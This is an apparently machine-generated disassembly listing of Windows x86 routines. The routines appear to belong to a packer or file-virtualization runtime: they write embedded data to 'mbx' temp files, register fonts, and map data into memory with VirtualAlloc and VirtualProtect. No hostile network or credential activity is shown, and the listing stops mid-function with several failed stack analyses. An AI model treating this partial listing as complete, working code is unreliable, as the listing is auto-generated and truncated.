mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4139F0
mov eax, [ebp+var_6C]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_70], 1
jmp short loc_4139F4
; ---------------------------------------------------------------------------
loc_4139F0: ; CODE XREF: sub_41396C+6F�j
and [ebp+var_70], 0
loc_4139F4: ; CODE XREF: sub_41396C+82�j
movzx eax, [ebp+var_70]
test eax, eax
jz loc_413D31
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_20]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
cmp [ebp+var_30], 0
jnz short loc_413A3E
push ds:off_4214F0
push 22h
push ds:off_4214F4
call sub_41BB7C
loc_413A3E: ; CODE XREF: sub_41396C+BD�j
mov eax, ds:dword_424868
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_413A5F
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_413A63
; ---------------------------------------------------------------------------
loc_413A5F: ; CODE XREF: sub_41396C+DE�j
and [ebp+var_78], 0
loc_413A63: ; CODE XREF: sub_41396C+F1�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_413ACF
mov [ebp+var_4], 1
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_424868
call sub_41EB4C
test eax, eax
jz short loc_413AA8
push 0FFFFFFFFh
mov [ebp+var_84], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp loc_413D33
; ---------------------------------------------------------------------------
loc_413AA8: ; CODE XREF: sub_41396C+118�j
and [ebp+var_4], 0
call sub_413AB3
jmp short loc_413ACF
sub_41396C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413AB3 proc near ; CODE XREF: sub_41396C+140�p
; DATA XREF: _4:0042131C�o
mov eax, ds:dword_424868
mov [ebp-7Ch], eax
cmp dword ptr [ebp-7Ch], 0
jz short locret_413ACE
mov eax, [ebp-7Ch]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_413ACE: ; CODE XREF: sub_413AB3+C�j
retn
sub_413AB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41396C
loc_413ACF: ; CODE XREF: sub_41396C+FD�j
; sub_41396C+145�j
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
mov [ebp+var_2C], eax
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_54], eax
mov eax, [ebp+var_54]
mov [ebp+var_1C], eax
push [ebp+var_1C]
push 104h
call ds:dword_4246B4 ; GetTempPathA
push [ebp+var_2C]
push 0
push offset aMbx ; "mbx"
push [ebp+var_1C]
call ds:dword_4246B0 ; GetTempFileNameA
push 0
push 0
push 4
push 0
push 1
push 40000000h
push [ebp+var_2C]
call ds:dword_424628 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_413B5B
push 0FFFFFFFFh
mov [ebp+var_88], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_88]
jmp loc_413D33
; ---------------------------------------------------------------------------
loc_413B5B: ; CODE XREF: sub_41396C+1CB�j
push 1000h
call sub_41BA4A
pop ecx
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
mov [ebp+var_24], eax
and [ebp+var_38], 0
loc_413B73: ; CODE XREF: sub_41396C+2BF�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
cmp ecx, [eax+8]
jnb loc_413C30
mov eax, [ebp+var_34]
mov eax, [eax+8]
mov [ebp+var_48], eax
cmp [ebp+var_48], 1000h
jbe short loc_413B9B
mov [ebp+var_48], 1000h
loc_413B9B: ; CODE XREF: sub_41396C+226�j
lea eax, [ebp+var_40]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push [ebp+var_48]
push [ebp+var_24]
push [ebp+var_20]
call sub_415175
test eax, eax
jz short loc_413BBD
cmp [ebp+var_40], 0
jnz short loc_413BDF
loc_413BBD: ; CODE XREF: sub_41396C+249�j
push 0FFFFFFFFh
mov [ebp+var_8C], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_8C]
jmp loc_413D33
; ---------------------------------------------------------------------------
loc_413BDF: ; CODE XREF: sub_41396C+24F�j
push 0
lea eax, [ebp+var_44]
push eax
push [ebp+var_3C]
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_42473C ; WriteFile
test eax, eax
jz short loc_413C00
mov eax, [ebp+var_44]
cmp eax, [ebp+var_3C]
jz short loc_413C22
loc_413C00: ; CODE XREF: sub_41396C+28A�j
push 0FFFFFFFFh
mov [ebp+var_90], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_90]
jmp loc_413D33
; ---------------------------------------------------------------------------
loc_413C22: ; CODE XREF: sub_41396C+292�j
mov eax, [ebp+var_38]
add eax, [ebp+var_3C]
mov [ebp+var_38], eax
jmp loc_413B73
; ---------------------------------------------------------------------------
loc_413C30: ; CODE XREF: sub_41396C+210�j
push [ebp+var_28]
call ds:dword_424624 ; CloseHandle
or [ebp+var_28], 0FFFFFFFFh
push [ebp+var_2C]
call ds:dword_42475C ; AddFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_413C5C
push [ebp+var_2C]
call ds:dword_424640 ; DeleteFileA
loc_413C5C: ; CODE XREF: sub_41396C+2E5�j
push 8
call sub_41BA4A
pop ecx
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jz short loc_413C87
mov eax, [ebp+var_5C]
and dword ptr [eax], 0
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov eax, [ebp+var_5C]
mov [ebp+var_94], eax
jmp short loc_413C8E
; ---------------------------------------------------------------------------
loc_413C87: ; CODE XREF: sub_41396C+2FF�j
and [ebp+var_94], 0
loc_413C8E: ; CODE XREF: sub_41396C+319�j
push [ebp+var_94]
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_424868
call sub_410000
and [ebp+var_2C], 0
push 0FFFFFFFFh
mov [ebp+var_98], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_98]
jmp short loc_413D33
; END OF FUNCTION CHUNK FOR sub_41396C
; =============== S U B R O U T I N E =======================================
sub_413CC7 proc near ; DATA XREF: _4:00421310�o
mov eax, ds:dword_424864
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_413CE2
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
loc_413CE2: ; CODE XREF: sub_413CC7+C�j
cmp dword ptr [ebp-20h], 0FFFFFFFFh
jz short loc_413CF4
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-20h]
call sub_41473F
loc_413CF4: ; CODE XREF: sub_413CC7+1F�j
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_413D03
push dword ptr [ebp-28h]
call ds:dword_424624 ; CloseHandle
loc_413D03: ; CODE XREF: sub_413CC7+31�j
mov eax, [ebp-2Ch]
mov [ebp-60h], eax
push dword ptr [ebp-60h]
call sub_41BACD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-64h], eax
push dword ptr [ebp-64h]
call sub_41BACD
pop ecx
mov eax, [ebp-24h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_41BACD
pop ecx
retn
sub_413CC7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41396C
loc_413D31: ; CODE XREF: sub_41396C+53�j
; sub_41396C+5D�j ...
xor eax, eax
loc_413D33: ; CODE XREF: sub_41396C+137�j
; sub_41396C+1EA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_41396C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D44 proc near ; CODE XREF: sub_41E552+20�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421320
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 34h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
and [ebp+var_1C], 0
push 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_41553D
test eax, eax
jz loc_413EDA
movzx eax, [ebp+var_24]
test eax, eax
jnz loc_413EDA
mov eax, ds:dword_424868
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_413DB8
mov eax, [ebp+var_34]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_38], 1
jmp short loc_413DBC
; ---------------------------------------------------------------------------
loc_413DB8: ; CODE XREF: sub_413D44+5F�j
and [ebp+var_38], 0
loc_413DBC: ; CODE XREF: sub_413D44+72�j
movzx eax, [ebp+var_38]
test eax, eax
jz loc_413EDA
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_424868
call sub_41EB4C
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_413EA8
mov eax, [ebp+var_28]
cmp dword ptr [eax], 0
jz short loc_413E08
push ds:off_4214F0
push 70h
push ds:off_4214F4
call sub_41BB7C
loc_413E08: ; CODE XREF: sub_413D44+AF�j
mov eax, [ebp+var_28]
cmp dword ptr [eax+4], 0
jnz short loc_413E24
push ds:off_4214F0
push 71h
push ds:off_4214F4
call sub_41BB7C
loc_413E24: ; CODE XREF: sub_413D44+CB�j
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_42476C ; RemoveFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_424640 ; DeleteFileA
push [ebp+var_1C]
mov ecx, ds:dword_424868
call sub_41EBBB
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_413E8B
mov eax, [ebp+var_2C]
mov eax, [eax+4]
mov [ebp+var_3C], eax
push [ebp+var_3C]
call sub_41BACD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_413E83
push [ebp+var_2C]
call sub_41BACD
pop ecx
loc_413E83: ; CODE XREF: sub_413D44+134�j
mov eax, [ebp+var_2C]
mov [ebp+var_44], eax
jmp short loc_413E8F
; ---------------------------------------------------------------------------
loc_413E8B: ; CODE XREF: sub_413D44+118�j
and [ebp+var_44], 0
loc_413E8F: ; CODE XREF: sub_413D44+145�j
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp short loc_413EDC
; ---------------------------------------------------------------------------
loc_413EA8: ; CODE XREF: sub_413D44+A3�j
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp short loc_413EDC
; ---------------------------------------------------------------------------
loc_413EBE: ; DATA XREF: _4:00421328�o
mov eax, ds:dword_424868
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jz short locret_413ED9
mov eax, [ebp+var_40]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_413ED9: ; CODE XREF: sub_413D44+186�j
retn
; ---------------------------------------------------------------------------
loc_413EDA: ; CODE XREF: sub_413D44+41�j
; sub_413D44+4D�j ...
xor eax, eax
loc_413EDC: ; CODE XREF: sub_413D44+162�j
; sub_413D44+178�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_413D44 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413EED proc near ; CODE XREF: sub_41E836+B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421330
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov eax, ds:dword_424860
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_413F33
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_413F37
; ---------------------------------------------------------------------------
loc_413F33: ; CODE XREF: sub_413EED+31�j
and [ebp+var_24], 0
loc_413F37: ; CODE XREF: sub_413EED+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_413FCC
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424860
call sub_41EB4C
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_413F74
push 0FFFFFFFFh
and [ebp+var_2C], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_413FCE
; ---------------------------------------------------------------------------
loc_413F74: ; CODE XREF: sub_413EED+6F�j
push 8000h
push 0
push [ebp+arg_0]
call ds:dword_424728 ; VirtualFree
mov ecx, [ebp+arg_4]
mov [ecx], eax
push [ebp+arg_0]
mov ecx, ds:dword_424860
call sub_41EBBB
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_413FCE
; ---------------------------------------------------------------------------
loc_413FB0: ; DATA XREF: _4:00421338�o
mov eax, ds:dword_424860
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short locret_413FCB
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_413FCB: ; CODE XREF: sub_413EED+CF�j
retn
; ---------------------------------------------------------------------------
loc_413FCC: ; CODE XREF: sub_413EED+50�j
xor eax, eax
loc_413FCE: ; CODE XREF: sub_413EED+85�j
; sub_413EED+C1�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_413EED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FDF proc near ; CODE XREF: sub_41E7F7+17�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421340
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 40h
push ebx
push esi
push edi
and [ebp+var_20], 0
mov eax, [ebp+arg_14]
and dword ptr [eax], 0
and [ebp+var_24], 0
mov [ebp+var_1C], 2
mov eax, ds:dword_424864
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jz short loc_41403A
mov eax, [ebp+var_44]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_48], 1
jmp short loc_41403E
; ---------------------------------------------------------------------------
loc_41403A: ; CODE XREF: sub_413FDF+46�j
and [ebp+var_48], 0
loc_41403E: ; CODE XREF: sub_413FDF+59�j
movzx eax, [ebp+var_48]
test eax, eax
jz loc_414201
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_41407E
push 0FFFFFFFFh
and [ebp+var_50], 0
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_50]
jmp loc_414203
; ---------------------------------------------------------------------------
loc_41407E: ; CODE XREF: sub_413FDF+84�j
mov eax, [ebp+var_28]
mov eax, [eax]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov eax, [eax]
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
cmp ecx, [eax+8]
jbe short loc_4140A6
push 57h
call ds:dword_42470C ; RtlRestoreLastWin32Error
jmp loc_4141B6
; ---------------------------------------------------------------------------
loc_4140A6: ; CODE XREF: sub_413FDF+B8�j
cmp [ebp+arg_10], 0
jnz short loc_4140B8
mov eax, [ebp+var_30]
mov eax, [eax+8]
sub eax, [ebp+arg_C]
mov [ebp+arg_10], eax
loc_4140B8: ; CODE XREF: sub_413FDF+CB�j
mov eax, [ebp+arg_10]
add eax, [ebp+arg_C]
mov ecx, [ebp+var_30]
cmp eax, [ecx+8]
jbe short loc_4140D3
push 57h
call ds:dword_42470C ; RtlRestoreLastWin32Error
jmp loc_4141B6
; ---------------------------------------------------------------------------
loc_4140D3: ; CODE XREF: sub_413FDF+E5�j
mov eax, [ebp+arg_4]
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jbe short loc_4140F7
cmp [ebp+var_54], 2
jbe short loc_4140F0
cmp [ebp+var_54], 0F001Fh
jz short loc_4140F0
jmp short loc_4140F7
; ---------------------------------------------------------------------------
loc_4140F0: ; CODE XREF: sub_413FDF+104�j
; sub_413FDF+10D�j
mov [ebp+var_1C], 4
loc_4140F7: ; CODE XREF: sub_413FDF+FE�j
; sub_413FDF+10F�j
push 4
push 1000h
push [ebp+arg_10]
push 0
call ds:dword_424724 ; VirtualAlloc
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_414117
jmp loc_4141B6
; ---------------------------------------------------------------------------
loc_414117: ; CODE XREF: sub_413FDF+131�j
push 0
push 0
push [ebp+arg_C]
push [ebp+arg_0]
call sub_41441F
and [ebp+var_34], 0
loc_41412A: ; CODE XREF: sub_413FDF+192�j
mov eax, [ebp+var_34]
cmp eax, [ebp+arg_10]
jnb short loc_414173
and [ebp+var_3C], 0
lea eax, [ebp+var_38]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
mov eax, [ebp+arg_10]
sub eax, [ebp+var_34]
push eax
mov eax, [ebp+var_20]
add eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call sub_415175
test eax, eax
jz short loc_414166
cmp [ebp+var_38], 0
jz short loc_414166
cmp [ebp+var_3C], 0
jnz short loc_414168
loc_414166: ; CODE XREF: sub_413FDF+179�j
; sub_413FDF+17F�j
jmp short loc_4141B6
; ---------------------------------------------------------------------------
loc_414168: ; CODE XREF: sub_413FDF+185�j
mov eax, [ebp+var_34]
add eax, [ebp+var_3C]
mov [ebp+var_34], eax
jmp short loc_41412A
; ---------------------------------------------------------------------------
loc_414173: ; CODE XREF: sub_413FDF+151�j
cmp [ebp+var_1C], 4
jz short loc_414192
lea eax, [ebp+var_40]
push eax
push [ebp+var_1C]
push [ebp+arg_10]
push [ebp+var_20]
call ds:dword_42472C ; VirtualProtect
test eax, eax
jnz short loc_414192
jmp short loc_4141B6
; ---------------------------------------------------------------------------
loc_414192: ; CODE XREF: sub_413FDF+198�j
; sub_413FDF+1AF�j
push [ebp+var_2C]
push [ebp+var_20]
mov ecx, ds:dword_424860
call sub_410000
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_20]
mov [eax], ecx
and [ebp+var_20], 0
mov [ebp+var_24], 1
loc_4141B6: ; CODE XREF: sub_413FDF+C2�j
; sub_413FDF+EF�j ...
push 0FFFFFFFFh
mov [ebp+var_58], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_58]
jmp short loc_414203
; ---------------------------------------------------------------------------
loc_4141CF: ; DATA XREF: _4:00421348�o
mov eax, ds:dword_424864
mov [ebp+var_4C], eax
cmp [ebp+var_4C], 0
jz short loc_4141EA
mov eax, [ebp+var_4C]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
loc_4141EA: ; CODE XREF: sub_413FDF+1FC�j
cmp [ebp+var_20], 0
jz short locret_414200
push 8000h
push 0
push [ebp+var_20]
call ds:dword_424728 ; VirtualFree
locret_414200: ; CODE XREF: sub_413FDF+20F�j
retn
; ---------------------------------------------------------------------------
loc_414201: ; CODE XREF: sub_413FDF+65�j
xor eax, eax
loc_414203: ; CODE XREF: sub_413FDF+9A�j
; sub_413FDF+1EE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_413FDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414214 proc near ; CODE XREF: sub_41E77F+11�p
; sub_41E7BB+11�p
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00414331 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421350
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
mov eax, ds:dword_424864
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_414260
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_414264
; ---------------------------------------------------------------------------
loc_414260: ; CODE XREF: sub_414214+37�j
and [ebp+var_2C], 0
loc_414264: ; CODE XREF: sub_414214+4A�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_414331
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_41430A
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_1C]
mov eax, [eax]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_424628 ; CreateFileA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jz short loc_4142F1
push 10h
call sub_41BA4A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
mov esi, [ebp+var_1C]
mov edi, [ebp+var_20]
movsd
movsd
movsd
movsd
mov eax, [ebp+var_20]
mov ecx, [ebp+arg_4]
mov ecx, [ecx]
mov [eax+8], ecx
push [ebp+var_20]
mov eax, [ebp+arg_4]
push dword ptr [eax]
mov ecx, ds:dword_424864
call sub_41EC69
loc_4142F1: ; CODE XREF: sub_414214+A2�j
push 0FFFFFFFFh
mov [ebp+var_34], 1
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_34]
jmp short loc_414333
; ---------------------------------------------------------------------------
loc_41430A: ; CODE XREF: sub_414214+75�j
or [ebp+var_4], 0FFFFFFFFh
call sub_414315
jmp short loc_414331
sub_414214 endp
; =============== S U B R O U T I N E =======================================
sub_414315 proc near ; CODE XREF: sub_414214+FA�p
; DATA XREF: _4:00421358�o
mov eax, ds:dword_424864
mov [ebp-30h], eax
cmp dword ptr [ebp-30h], 0
jz short locret_414330
mov eax, [ebp-30h]
add eax, 10h
push eax
call ds:dword_421018 ; RtlLeaveCriticalSection
locret_414330: ; CODE XREF: sub_414315+C�j
retn
sub_414315 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414214
loc_414331: ; CODE XREF: sub_414214+56�j
; sub_414214+FF�j
xor eax, eax
loc_414333: ; CODE XREF: sub_414214+F4�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_414214
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414344 proc near ; CODE XREF: sub_410386+17�p
; sub_413056+39�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_C]
or dword ptr [eax], 0FFFFFFFFh
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41553D
test eax, eax
jz loc_414419
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_414419
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_8], eax
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
push dword ptr [eax+0Ch]
call ds:dword_424628 ; CreateFileA
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_414414
push 0
push 0
mov eax, [ebp+var_8]
push dword ptr [eax+4]
mov eax, [ebp+arg_C]
push dword ptr [eax]
call ds:dword_424708 ; SetFilePointer
push 10h
call sub_41BA4A
pop ecx
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov ecx, [ecx]
mov [eax+8], ecx
mov eax, [ebp+var_10]
and dword ptr [eax+4], 0
movzx eax, [ebp+arg_10]
neg eax
sbb eax, eax
and eax, 0C0000000h
add eax, 40000000h
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
push [ebp+var_10]
mov eax, [ebp+arg_C]
push dword ptr [eax]
mov ecx, ds:dword_424864
call sub_410000
loc_414414: ; CODE XREF: sub_414344+63�j
push 1
pop eax
jmp short locret_41441B
; ---------------------------------------------------------------------------
loc_414419: ; CODE XREF: sub_414344+20�j
; sub_414344+2C�j
xor eax, eax
locret_41441B: ; CODE XREF: sub_414344+D3�j
leave
retn 14h
sub_414344 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41441F proc near ; CODE XREF: sub_413FDF+142�p
; sub_419529+104�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 0041465D SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421360
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
cmp [ebp+arg_C], 0
jnz short loc_414450
lea eax, [ebp+var_1C]
mov [ebp+arg_C], eax
loc_414450: ; CODE XREF: sub_41441F+29�j
mov eax, ds:dword_424864
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_414471
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_42101C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_414475
; ---------------------------------------------------------------------------
loc_414471: ; CODE XREF: sub_41441F+3D�j
and [ebp+var_30], 0
loc_414475: ; CODE XREF: sub_41441F+50�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_41465D
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_424864
call sub_41EB4C
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_414636
mov eax, [ebp+var_24]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
and eax, 1
test eax, eax
jz short loc_4144E9
push [ebp+arg_8]
push 0
push [ebp+arg_4]
push [ebp+arg_0]
